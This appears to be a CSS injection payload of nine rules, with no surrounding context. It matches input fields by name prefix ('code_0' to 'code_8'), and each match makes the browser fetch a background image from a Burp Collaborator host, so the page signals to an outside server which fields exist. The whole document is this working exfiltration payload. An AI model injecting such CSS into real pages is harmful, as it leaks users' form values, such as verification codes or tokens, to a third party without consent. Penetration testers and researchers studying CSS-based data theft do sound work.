input[name^="code_0"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/0'); }
input[name^="code_1"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/1'); }
input[name^="code_2"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/2'); }
input[name^="code_3"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/3'); }
input[name^="code_4"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/4'); }
input[name^="code_5"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/5'); }
input[name^="code_6"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/6'); }
input[name^="code_7"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/7'); }
input[name^="code_8"] { background: url('https://qtngzn5snqh5zf3azw4zme0m0d6bu0.burpcollaborator.net/8'); }
